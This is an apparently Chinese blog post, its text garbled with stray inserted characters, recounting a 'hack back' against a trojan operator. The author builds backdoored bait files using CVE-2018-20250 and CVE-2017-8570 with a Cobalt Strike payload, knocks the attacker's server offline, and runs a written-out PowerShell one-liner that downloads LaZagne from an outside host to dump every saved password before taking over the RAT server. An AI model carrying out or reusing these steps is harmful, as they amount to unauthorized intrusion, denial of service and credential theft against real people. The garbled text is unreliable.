發(fā)現(xiàn)可疑文件

花了半天時(shí)間讨韭，下載了QQ群中大大小小好幾款相關(guān)的工具分析了下，要么無(wú)法運(yùn)行，各種報(bào)錯(cuò)透硝，但并沒(méi)有發(fā)現(xiàn)什么可疑的點(diǎn)吉嚣。在準(zhǔn)備放棄的時(shí)候，果不其然蹬铺，發(fā)現(xiàn)一款工具尝哆，解壓需要輸入密碼，單就這一點(diǎn)我就覺(jué)得很可疑了甜攀。

二話不說(shuō)秋泄，撥掉網(wǎng)線，打開(kāi)虛擬機(jī)规阀，啟動(dòng)火絨劍恒序，運(yùn)行該可疑程序，用火絨劍監(jiān)控程序進(jìn)程谁撼、文件訪問(wèn)歧胁、動(dòng)作、網(wǎng)絡(luò)連接等情況厉碟，馬上就發(fā)現(xiàn)這個(gè)工具是被加過(guò)料的喊巍，工具自身會(huì)創(chuàng)建jpg文件到C盤(pán)，并且加注冊(cè)表箍鼓，創(chuàng)建服務(wù)項(xiàng)崭参，還一直反向連接一個(gè)境外IP的1640端口，走TCP流量款咖。

一查此IP何暮，被人舉報(bào)過(guò)，確定是老黑的遠(yuǎn)控服務(wù)器铐殃，并且能ping通海洼，基本確定下來(lái)了，是木馬遠(yuǎn)控的監(jiān)聽(tīng)端口富腊。

花了大概半天的時(shí)間坏逢，對(duì)這臺(tái)服務(wù)器進(jìn)行了常規(guī)的滲透，從信息搜集蟹肘、全端口词疼、服務(wù)、弱口令帘腹、綁定的域名等等常規(guī)的方式進(jìn)行滲透贰盗，可能是由于目標(biāo)太小，也可能是自己時(shí)間太緊等等原因阳欲，這臺(tái)木馬遠(yuǎn)控服務(wù)器并沒(méi)有拿下來(lái)舵盈，又搞了半天陋率，還是一無(wú)所獲。

思路擴(kuò)展

既然是老黑的遠(yuǎn)控秽晚，那他在我的電腦里面種了木馬之后瓦糟，很可能會(huì)翻我電腦的各種文件，于是就將計(jì)就計(jì)吧赴蝇，那我精心制作一些比較有吸引力的文件吧菩浙，放置在我的電腦桌面，讓老黑都去拿句伶。

于是我在外網(wǎng)搭建了CobaltStrike遠(yuǎn)控劲蜻，正式向老黑發(fā)起了戰(zhàn)爭(zhēng)。

制作魚(yú)餌

為了能提高老黑電腦的釣魚(yú)上線成功率考余，最終我選擇制作如下幾種類型的文件先嬉，放置到我的電腦桌面，順便把我制作的過(guò)程分享楚堤。

1疫蔓、制作winrar釣魚(yú)壓縮包文件

制作還是很簡(jiǎn)單的，利用CVE-2018-20250漏洞

2身冬、構(gòu)造RDPInception后門(mén)衅胀，留一臺(tái)外網(wǎng)VPS

自己寫(xiě)了以下三個(gè)文件：

powershell.vbs文件放置到我的外網(wǎng)VPS上的："C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\powershell.vbs"

windows.bat文件放置到我的外網(wǎng)VPS上的："C:\windows.bat"

WindowsMedia.bat文件放置到我的外網(wǎng)VPS上的："C:\Program Files\WindowsMedia.bat"

powershell.vbs主要用于隱藏執(zhí)行，不會(huì)出現(xiàn)黑窗口三個(gè)文件的內(nèi)容如下吏恭，用過(guò)的人一看就懂了：

準(zhǔn)備好后拗小，我注銷(xiāo)了外網(wǎng)這臺(tái)VPS服務(wù)器，因?yàn)橹挥凶N(xiāo)后樱哼，被人登錄才會(huì)觸發(fā)我的vbs腳本。

3剿配、制作Office文檔木馬

利用CVE-2017-8570漏洞

修改了calc文件中的代碼為CobaltStrike遠(yuǎn)控上線代碼

制作出來(lái)的文件：

4搅幅、最終效果

所有的文件和壓縮包里面都是有數(shù)據(jù)的，做的也不能太假了呼胚。這些文件都是加過(guò)料的后門(mén)茄唐。

魚(yú)餌制作完成，在釣魚(yú)機(jī)器上運(yùn)行帶木馬遠(yuǎn)控的工具蝇更，對(duì)了沪编，先把電腦上的相關(guān)解壓工具、Office年扩，都卸載掉蚁廓，這些加過(guò)料的文件就無(wú)法在我本機(jī)上打開(kāi)，老黑想要查看厨幻，就必須放置到他自己的電腦上解壓后才能打開(kāi)相嵌。

攻擊至宕機(jī)

準(zhǔn)備就緒腿时，就等老黑來(lái)上鉤了。等了兩天我的CobaltStrike沒(méi)有反應(yīng)饭宾，可能也是比較狡猾吧批糟，并沒(méi)有我想象的那么順利，閑來(lái)無(wú)事看铆，晚上先把老黑的木馬遠(yuǎn)控服務(wù)器打宕機(jī)吧徽鼎。

呵呵，結(jié)果才打了不到30秒弹惦，服務(wù)器就掛了……

內(nèi)網(wǎng)電腦上鉤

我用于釣魚(yú)的外網(wǎng)VPS被異地登錄否淤，釣魚(yú)很可能成功了。

中午查看下C盤(pán)我VPS上的WindowsMedia.bat文件肤频，文件已經(jīng)不在了叹括，看來(lái)已經(jīng)成功植入到老黑的電腦上了。

等到了第二天上午9點(diǎn)半左右宵荒，我的CobaltStrike果真有機(jī)器上線了汁雷。因?yàn)槲募菑?fù)制到目標(biāo)的Start開(kāi)機(jī)自啟目錄，需要機(jī)器重啟才會(huì)引起上線报咳，所以可能就到了第二天吧侠讯。

查看了下桌面，應(yīng)該是個(gè)做黑色產(chǎn)業(yè)鏈的團(tuán)隊(duì)吧暑刃，Skype聊天軟件上的人還不少厢漩。

還是為內(nèi)網(wǎng)環(huán)境：

好了這個(gè)先不管，查詢了下Tasklist岩臣。

使用LaZagne抓取電腦上各種連接密碼

發(fā)現(xiàn)被控的電腦開(kāi)機(jī)時(shí)間并不久溜嗜，大概也能判斷出來(lái)，此人下班有關(guān)電腦的習(xí)慣架谎。

順手就給他加個(gè)后門(mén)維持吧炸宵，為了不打草驚蛇，破壞我的好事谷扣，等到中年12點(diǎn)半他去午休睡覺(jué)土全，我再來(lái)偷偷作戰(zhàn)。

到了中午13:00點(diǎn)左右会涎，果然計(jì)算機(jī)還在線裹匙。本來(lái)想用mimikatz來(lái)抓密碼，但是mimikat抓的太少了末秃，只能抓系統(tǒng)密碼概页，所以我選擇了LaZagne，直接用以下命令一鍵抓取他的電腦上所有密碼（Wifi蛔溃、遠(yuǎn)程桌面绰沥、系統(tǒng)密碼篱蝇、Chrome、遠(yuǎn)程桌面等等保存的密碼）：

(echo powershell "($client = new‐object System.Net.WebClient) ‐and($client.DownloadFile('http://www.huihun.ml/laZagne.exe','wmplaye.exe')) ‐and (exit)") | cmd && wmplaye.exe all

今天又是一大波收獲徽曲，計(jì)算上的各種遠(yuǎn)程服務(wù)器的密碼零截、Chrome網(wǎng)站密碼、其中最重要的木馬遠(yuǎn)控服務(wù)器賬號(hào)密碼全部搞出來(lái)了秃臣。

成功登上木馬遠(yuǎn)控服務(wù)器

使用抓取出來(lái)的賬號(hào)與密碼登錄木馬遠(yuǎn)控服務(wù)器涧衙。老黑原來(lái)使用的是DarkComet-RAT遠(yuǎn)控， 上面被控的機(jī)器還真不少奥此。

此次收獲的資料也不少弧哎，隨便登錄其中一些WEB域名管理系統(tǒng)，更加確定又是一個(gè)做黑色產(chǎn)業(yè)鏈的了稚虎，

在其中的一個(gè)系統(tǒng)中撤嫩，找到了他的身份證實(shí)名信息，企業(yè)營(yíng)業(yè)執(zhí)照蠢终、我也不知是真還是假序攘。

橫向滲透、干內(nèi)網(wǎng)寻拂、舉報(bào)一波

到這里關(guān)于反向的釣魚(yú)就先告一段落程奠，今晚準(zhǔn)備通宵干他的內(nèi)網(wǎng)，再舉報(bào)一波祭钉。

總結(jié)

本次制作了三種類型的釣魚(yú)文件瞄沙，結(jié)果只有一種成功利用上鉤了。并不是每次定向釣魚(yú)都會(huì)成功慌核，很多時(shí)候都是失敗告終的距境，個(gè)人業(yè)余玩玩，所以此次的對(duì)抗并沒(méi)有什么目標(biāo)垮卓，這些都是工作之余抽出來(lái)時(shí)間在做肮疗。在剛開(kāi)始的時(shí)候也沒(méi)有那么順利，在制作釣魚(yú)文件之初扒接，會(huì)出現(xiàn)許多大大小小的問(wèn)題，到最后攻擊過(guò)程的整理也花了不少精力们衙。

所以在日常工作還有生活中钾怔，同學(xué)們還是要提高安全意識(shí)，不要運(yùn)行來(lái)歷不明的程序蒙挑、文檔宗侦、文件，下載的文件很可能就被人綁了木馬病毒忆蚀，并不是所有的殺軟都能查殺的矾利。